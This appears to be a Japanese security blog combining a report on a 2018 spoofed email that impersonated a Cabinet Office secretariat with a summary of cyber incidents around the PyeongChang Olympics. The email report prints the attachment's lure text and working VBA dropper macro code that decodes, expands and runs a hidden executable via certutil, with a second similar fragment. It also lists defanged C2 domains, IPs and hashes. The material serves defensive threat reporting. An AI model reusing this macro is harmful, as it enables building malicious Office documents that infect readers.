2018年3月12日頃、内閣府の総合海洋政策推進事務局になりすましたメールが確認されたとの参考情報を得ました。

ここではなりすましメールの関連情報をまとめます。

詐称メールの情報

詐称メールの情報を整理すると次の通りです。

確認された時期2018年3月12日(月)昼頃
差出人名無し(送信元アドレスそのまま表記)
送信元アドレス ******_0****@yahoo.co.jp
件名新旧参与会議意見書の比較
本文**先生

大変お世話になっております。
内閣府総合海洋政策推進事務局でございます。

新旧参与会議意見書の比較につき、情報共有いたします。
よろしくご査収願います。
**拝

--------------------
内閣府総合海洋政策推進事務局
参事官補佐
** *(**** ******)
MAIL: **************@cao.go.jp
TEL: 03-6257-****
--------------------
添付ファイル有り

添付ファイルの情報

ドキュメント上部の黄色のメッセージバーを注してください。

1.「編集を有効にする」をクリックします。

2.「コンテンツの有効化」をクリックします。

Private Sub Document_Close()
Dim ZaRmOsIFuGrHzCUw As Long
Dim HfNoBoTFzClPnIKu As String
HfNoBoTFzClPnIKu = Environ("temp") & "\UiHxUvNNtFiTaXZl"
ZaRmOsIFuGrHzCUw = ActiveDocument.Content.End
Set FzQcYhSAgUcYcNVu = ActiveDocument.Range(1, ZaRmOsIFuGrHzCUw)
Set LhEtKtONyFfQwSOp = CreateObject("Scripting.FileSystemObject")
Set JpKzRgIXpSnJuHNd = LhEtKtONyFfQwSOp.CreateTextFile(HfNoBoTFzClPnIKu, True)
JpKzRgIXpSnJuHNd.WriteLine (FzQcYhSAgUcYcNVu)
JpKzRgIXpSnJuHNd.Close
Set UwZhPzKHoBiMmRIb = CreateObject("Wscript.Shell")
UwZhPzKHoBiMmRIb.Run "cmd.exe /c certutil -decode %temp%\\UiHxUvNNtFiTaXZl %temp%\\ViLlOmGPlPmIhLHa", 0, True
UwZhPzKHoBiMmRIb.Run "cmd.exe /c expand %temp%\\ViLlOmGPlPmIhLHa -F:* %temp%\\", 0, True
UwZhPzKHoBiMmRIb.Run "cmd.exe /c %temp%\\VizorHtmlDialog.exe", 0, False
UwZhPzKHoBiMmRIb.Run "cmd.exe /c del %temp%\\UiHxUvNNtFiTaXZl", 0, False
UwZhPzKHoBiMmRIb.Run "cmd.exe /c del %temp%\\ViLlOmGPlPmIhLHa", 0, False
Set UwZhPzKHoBiMmRIb = Nothing
Set LhEtKtONyFfQwSOp = Nothing
End Sub

関連が疑われる情報

【上部の黄色のメッセージ バーが表示された状態で】

「編集を有効にする」をクリックします。その後、「コンテンツの有効化」ボタンをクリックします。

Set DGHjIKbFRghjH = jIHiuHY.CreateTextFile(HYFRTghYcU, True)
DGHjIKbFRghjH.WriteLine (crHJUgVD)
DGHjIKbFRghjH.Close
Set uVFTyuiVGT = CreateObject("Wscript.Shell")
uVFTyuiVGT.Run "cmd.exe /c certutil -decode %temp%\\HfRYgyugy %temp%\\IcfRyFiuHdeU", 0, True
uVFTyuiVGT.Run "cmd.exe /c expand %temp%\\IcfRyFiuHdeU -F:* %temp%\\", 0, True
uVFTyuiVGT.Run "cmd.exe /c %temp%\\VizorHtmlDialog.exe", 0, False
Set uVFTyuiVGT = Nothing
Set jIHiuHY = Nothing
End Sub

Private Sub Document_New()

End Sub

インディケーター情報

ファイル
ファイル名ハッシュ値
新旧参与会議意見書の比較.doc36fb6eb6c46a517391c722046c769a31283b784738f2b4ab62a4accb0528b0e0
世界経済アウトルック.doc5788b5a50cf8057f138a585221bb55498987a3510fe4e60b38aaa803bddbe1e9
通信
URLIPアドレス
samiratikhonova[.]camdvr[.]org185[.]80[.]53[.]206
friendlysupport[.]giize[.]com83[.]136[.]106[.]108

更新履歴

平昌五輪のサイバー関連の出来事をまとめてみた

2018年冬季オリンピック(平昌大会)に関連するサイバー空間上で起きた出来事をまとめます。

1.平昌大会に関連する不審な文書ファイル付きメール/Gold Dragon

(1) McAfeeが報告した不審メール
時期件名送信先送信先送信元FROM実際の送信元
2017年12月22日위험 경보 (전국야생조류 분변 고병원성 AI(H5N6형) 검출).docxHTAファイル埋め込み情報なし情報なし情報なし
2017年12月28日농식품부, 평창 동계올림픽 대비 축산악취 방지대책 관련기관 회의 개최.docマクロ埋め込みyj.kim@pyeongchang2018.com
ticketeting@pongchang2018.com
yeongseong.choi@pyeongchang2018.com
sanghee.cho@pyeongchang2018.com
icehockey@pyeongchang2018.com
info@nctc.go.krospf1-apac-sg.stickyadstv.com
43.249.39.152(シンガポール)
c388b693d10e2b84af52ab2c29eb9328e47c3c16
(2) 警察庁が報告した不審メール
時期件名件名送信先送信元FROM実際の送信元
2018年2月6日협박전화테러 예방.doc협박전화테러 예방sungwon.kim@kt.cominfo.kr@nctc.go.kr (表示:경찰청)情報なし
(3) Hauriが報告した不審メール
(4) Gold Dragon

2.Adobe Flash Palyer 0day

(1) KrCERT
(2) Adobe のセキュリティ情報
(3) セキュリティベンダの分析情報
(4) 攻撃の流れ概要
fec71b8479f3a416fa58580ae76a8c731c2294c24663c601a1267e0e5c2678a0
3b1395f620e428c5f68c6497a2338da0c4f749feb64e8f12e4c5b1288cc57a1c
hxxp://www.1588-2040[.]co.kr/conf/product_old.jpg
hxxp://www.1588-2040[.]co.kr/design/m/images/image/image.php
hxxp://www.korea-tax[.]info/main/local.php
hxxp://www.dylboiler[.]co.kr/admincenter/files/board/4/manager.php
(5) APT37が悪用した脆弱性

3.平昌五輪のイベントプログラムを偽装したマルウェア

OlympicGame.exe:d1ae2012fdbdbe9d8246d23f2fe4efa6865689d44cb7c7d7664366b2934f7e14

4.チケットに関連する事象

(1) 平昌五輪に乗じた詐欺行為
(2) チケット転売サイトのダフ行為

5.ロシアが平昌大会へのサイバー攻撃を行うとの疑念

(1) Fancy Bears'HTの動向

以下はリーク先に示されたページの表題

(2) ThreatConnectが発見したなりすましドメイン
インシデントNo
(疑わしいドメイン等)
詳細
Incident 20180122A: Berlinger Group Spoofed Domains
berlingergroup.com
過去の攻撃で利用されたレジストラDomains4Bitcoinsを通じて登録されたドメイン
89.33.246.121の専用サーバでホストされている。
vahmudzoltev@mail.comを利用して登録されており、同じアドレスで「berlinqer.com」が登録されている。
「berlinqer.com」は「91.205.149.202」でホストされている。これは正当なドメインのホスト先と同じ。
ただしmail.berlinqer.comは、berlingergroup.comをホストする同じ89.33.246.121が示されている。
berlinger.cloudは同じvahmudzoltev@protonmail.comを利用して登録されている。
このドメインが攻撃に利用されていたことは示していない。
Incident 20180119A: UKAD Spoofed Domain
login-ukad.org.uk
英国アンチドーピング機関のドメインに類似。
過去の攻撃で利用されたレジストラDomains4Bitcoinsを通じて登録されたドメイン
ホストされたIPは「185.189.112.191」である。
米国のアンチドーピング機関の偽装ドメインがホストされていたIPアドレスと同じブロックである。
SOAはluciyvarn@protonmail.comが登録されている。
同じメールアドレスで他にもukad.cloudが登録されている。
adfs-ukad.org.ukはlogin-ukad.org.ukと同じ組織名「Zender inc、同じアドレスの文字列「Vapaudenkatu 57」が利用されていた。
このドメインが攻撃に利用されていたことは示していない。
Incident 20180110B: Olympic Council of Asia Spoofed Domain
ocaia.org]
12月25日にTHCServersで登録された。
このサービスは過去に使用されたものと同じである。
アジアのオリンピック評議会「ocasia.org」のドメインに類似。
このドメインにホストされたIP「193.29.187.143」はほかに6つのドメインを共存している。
FancyBearは専用サーバーを用いることが多いが、登録時期と内容から精査する価値がある。
Incident 20180103C: Domains Registered by wadison@tuta.io
networksolutions.pw
23.227.207.182
過去の攻撃で利用されたレジストラDomains4Bitcoinsを通じて登録されたドメイン
専用サーバーの登録は過去にWADAの偽装ドメインの登録に使用されたメールアドレス「wadison@tuta.io」が使われている。
このドメインは現在利用されていない。
同じ電話番号で登録されたドメイン「spiderclix.com」、アドレス「spider.worker163@yandex.com」を確認したが不確実性がありより低い脅威評価を行っている。
Incident 20180103B: USADA Spoofed Domains
webmail-usada.org
米国のアンチドーピング機関 USADAのなりすまし偽装の疑念があるドメイン
185.189.112.242がホストされていた。
ドメインのSOAレコードとしてjeryfisk@tuta.ioが使用されていた。
別のUSADAをなりすます「usada.eu」にも使用されていたメールアドレスであった。
このドメインは運用に使用されていると評価はしていない。また必ずしもFancyBearに帰属しているものでもない。
(3) ワシントンポストの報道
(4) ロシア外務省の声明

6.米国関連組織の動き

(1) 平昌大会観光客へUS-CERTの注意喚起
(2) NCFTAのサイバーセキュリティ上の脅威に関する言及

7.開会式中のシステム障害/Olympic Destroyer

以下にまとめている。

8.炎上・誹謗中傷

(1) 平昌五輪公式サイトで日本列島の表記消滅
(2) ナ・ギョンウォン議員平昌オリンピック委員職を罷免
(3) 国際放送センターのカフェテリア食事写真炎上
(4) 韓国鉄道公社(KORAIL)への不満多数
(5) NBC解説者の開会式発言炎上

(6) 五輪参加選手への誹謗中傷
誹謗中傷を受けた選手概要
김보름選手(韓国)スピードスケートパシュート女子準々決勝
同試合ゴールで同選手は一緒に出場した他2選手を大きく引き離しゴール。
準決勝進出を逃した19日のパシュート試合後、仲間の遅れが原因ともとれる発言をした。
SNSに中傷が殺到し、非公開となった。
大統領府のホームページで国家代表資格の剥奪を求める請願に35万人以上が賛同を示した。
翌20日の記者会見で涙ながらに謝罪した。
Kim Boutin選手(カナダ)スピードスケート ショートトラック女子
500メートル決勝で同選手を押したとして韓国のチェ・ミンジョン選手が失格
Facebookなどに「殺してやる」との殺害予告等中傷する投稿が1万件確認された。*19
カナダ当局が選手保護に乗り出したとの報道
韓国当局も捜査を行い、繰り返し投稿している1名を聴取すると報道*20
ブタン選手のSNSには「ブタンも崔選手を押した」「反則でメダルを取った。恥を知れ」との韓国語や英語の非難が殺到、コメントは1万件を超えた
COCはこの事案についての声明を発表。
COC statement regarding Kim Boutin
최민정選手(韓国)スピードスケート ショートトラック女子3000mリレー決勝
2位でゴールした中国代表チームが失格
3週を残してアウトからインコースに入ってこようとしその際に韓国選手に反則行為をしたため。
中国代表は自国のインタビューに試合結果を受け入れるのは難しいとコメント
失格を通じ韓国の選手のSNS(Instagram)に中国語で書かれた悪質な書き込みが殺到
「韓国がどれほど卑劣か分かった」「韓国は中国の属国だ」等。*21
Jan Blokhuijsen選手(オランダ)スピードスケート 男子パシュート。
競技後の記者会見で「Please treat dogs better in this country」と発言。*22
当初中央日報電子版が「犬を食用にしないでください」と誤訳した。*23
犬肉食用文化を批判するものとして炎上。
メディアのFacebookページに発言に対する批判の書き込みが複数。
同選手はTwitterで謝罪コメントを掲載したがその後そのツイートは削除された。*24

9.平昌オリンピックに関係する数字

数字内容
20万ウォン〜200万ウォン平昌大会に関連する詐欺事件の被害金額
16件「平昌」、「オリンピック」で検索された結果2月11日報道時点で確認されたチケットの詐欺件数。
25サイト監視が行われていたWebサイトの数。公式サイト、チケット購入、聖火リレー等。
2万7000件2月14日にシステムに対して行われた攻撃を検出した件数
4500件2月18日にシステムに対して行われた攻撃を検出した件数

10.平昌大会中のサイバーセキュリティ対策・体制

(1) 情報保護委員会
(2) 技術分科委員会
(3) サイバーガーディアンズ
名前主な業績
シムジュンボ(심준보이사)代表(ハッカー連合HARU)ハッキングコミュニティ連合会長として活動中
ギムジングク(김진국 대표)代表(プレーンビット)デジタルフォレンジック分野専門家
イ・ジョンホ(심준보이사)研究員(ラオンセキュア)DEFCON、SECCONなど多数のサイバーセキュリティの国際大会で1位を収めた
河東州(최상명)最高技術責任者(NSHC)DEFCON出場4回の実績
ムンジョンヒョン(심준보이사)部長(イーストソフト)民・軍・警察のサイバー侵害事故防止の専門家
チェサンミョン(최상명 실장)室長(ハウリ)3.20サイバーテロを初めて認知。IssueMakersLabリーダー
ギムギョンゴン(김경곤)教授(高麗大)セキュリティコンサルティングとセキュリティ診断の専門家
(4) Ahnlab
(5) サイバーセキュリティに係る予算
(6) オリンピックCERT
参加組織役割
青瓦台国家安保室 サイバー安保秘書官室CERTの主導を担う。
国家情報院 国家サイバー安全センター 
文化体育観光部 サイバー安全センター 
科学技術情報通信インターネット侵害対応本部利用者情報保護のヒントを配布する等して適切な情報保護措置を取るように要請。
韓国インターネット振興院(KISA)DDoS攻撃のモニタリング、サイバー攻撃兆候の24時間体制での監視。(5名)
警察庁 サイバー安全局KISAと連携し、脅威の拡散行為などの遮断措置を担当。
国防省 サイバー司令部五輪関連ホームページの運営を支援。(4人(五輪)、3人(パラ))
AhnlabPCなどのエンドポイントセキュリティを担当
IGLOO SECURTIY侵害への対応、セキュリティコンサルティングの提供。
サイバーガーディアンズ国内最高の民間セキュリティ技術の専門家らで構成。公式サイトの脆弱性検査を行う。
AtoS開発、及びセキュリティ監視
KTデータセンターの運用、セキュリティ監視
双竜情報通信開発・個人情報保護
アカマイ主要な五輪のサービスの保護
(7) 脆弱性分析チーム
(8) 科学技術情報通信
ヒント主な内容
知らない人からの電子メール、ファイルは開いて見ていない・メールを送信した送信者(送信者)の名前とメールアドレスは、もう一度確認
・知らない人からのイベント当選文字、宅配便米受領文字などに含まれているリンクは、添付ファイルなどは、ダウンロードして実行していないことが最善
・添付ファイルをダウンロード受けたり関連リンクをクリックした場合には、必ずワクチンで検査して悪性コードの有無を確認し、必要な信頼できないWebサイトは、訪問していない.
P2P、トレントなどのセキュリティが脆弱なファイル共有サイトは訪問を自制・共有サイト訪問が避けられない場合には、必ず対策プログラムの最新の更新プログラムと有効
公式マーケットからアプリをダウンロードする・公式マーケット(アプリストア、Googleのプレイストア)とキャリアマーケット(ウォンストア)内の認証されたエプマン使用
・ワクチンプログラムをインストールしてウイルススキャンする
・使用するPCとスマートフォンでは、ワクチンプログラムのインストール
・定期的なワクチンプログラムの更新や検査などの安全なPCとスマートフォンを維持
オペレーティングシステムおよびソフトウェアは、自動更新の設定・利用者が使用しているオペレーティングシステムとソフトウェアは、新規セキュリティパッチが自動的に更新されるように設定する必要
・メーカーが定期的にセキュリティ更新プログラムをサポートしている本物のプログラムの使用をお勧めし重要データは、別の記憶媒体に保存
・ランサムウェアなどの被害を最小化するために重要なデータは必ず別に分離された媒体(USB、外付けハードなど)にバックアップして管理
PC内の共有フォルダは、外部からの不正なアクセスが可能なので、使用を控える・共有フォルダを使用する場合には、アルファベット、数字、特殊文字などの3つのタイプを使用して、ハッカーが類推しにくいパスワードを作成して使用
パスワードを設定して定期的に変更する・利用者が使用するパスワードは、他人が類推しやすい名前、誕生日、電話番号などの個人情報と関連した内容は、使用禁止
・周期的なパスワードの変更にハッキング個人情報の流出などの利用者被害予防

更新履歴

*1http://www.dailysecu.com/?mod=news&act=articleView&idxno=29636

*2http://news.joins.com/article/22350751

*3https://vpoint.jp/world/korea/107607.html

*4http://biz.heraldcorp.com/view.php?ud=20180210000038

*5https://www.nikkansports.com/olympic/pyeongchang2018/general/news/201802210000804.html

*6http://news.joins.com/article/22339291

*7https://www.reuters.com/article/us-olympics-2018-cyber/games-organizers-confirm-cyber-attack-wont-reveal-source-idUSKBN1FV036

*8http://www.etnews.com/20180131000459?SNS=00002

*9http://www.sankei.com/politics/news/170927/plt1709270046-n1.html

*10http://www.sankei.com/life/news/170927/lif1709270036-n1.html

*11http://www.vop.co.kr/A00001245760.html

*12http://mnews.joins.com/article/22309070#home

*13https://www.dispatch.co.kr/1121120

*14http://www.nocutnews.co.kr/news/4919029

*15http://news.nate.com/view/20180210n11312?mid=n1007

*16http://japanese.yonhapnews.co.kr/enter/2018/02/11/1001000000AJP20180211000900882.HTML

*17https://jp.reuters.com/article/olykorea-idJPKBN1FW06C

*18http://biz-journal.jp/2018/02/post_22362.html

*19http://www.sankei.com/pyeongchang2018/news/180215/pye1802150029-n1.html

*20http://www.sportalkorea.com/general/view.php?gisa_uniq=201802151808776261&key=&field=&section_code=D1000

*21http://news.donga.com/Top/3/05/20180221/88767920/2

*22http://japanese.joins.com/article/921/238921.html

*23http://www.sankei.com/pyeongchang2018/news/180222/pye1802220052-n1.html

*24https://www.newsweekjapan.jp/stories/world/2018/02/post-9591.php

*25https://www.sportsbusinessdaily.com/Daily/Issues/2018/02/20/On-The-Ground/Cyber-attacks.aspx

*26http://www.etnews.com/20160817000138?SNS=00002

*27https://www.newsweekjapan.jp/stories/world/2017/09/80-7.php

*28http://news.inews24.com/php/news_view.php?g_serial=1072573&g_menu=020200

*29http://news.donga.com/3/01/20180121/88291861/1?

*30http://www.yonhapnews.co.kr/bulletin/2018/02/07/0200000000AKR20180207086100017.HTML

Kango
Kango

piyokangoの日記。備忘録。